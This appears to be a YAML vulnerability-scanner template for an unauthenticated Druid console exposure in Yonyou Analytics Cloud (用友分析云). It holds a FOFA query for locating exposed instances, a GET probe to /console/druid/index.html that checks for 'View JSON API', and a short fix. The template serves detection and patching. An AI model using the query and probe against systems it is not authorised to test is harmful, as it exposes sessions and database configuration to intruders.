product: 用友分析云
vName: 用友分析云 Druid未授权访问
type: 访问控制
vID: [ ]
level: 2
vDesc: 用友分析云存在druid未授权访问漏洞，用友分析云默认启动druid，未对druid做登录认证，导致任意用户可直接访问druid，读取session、数据库配置、SQL监控、Spring监控、查看JsonApi。
version: ''
note: ''
search:
  FOFA: app="用友分析云"
protocol: http
link: https://blog.csdn.net/qq_34780861/article/details/137281645
fix:
  - 在yml的配置文件中配置权限
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /console/druid/index.html
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - View JSON API
            logic: and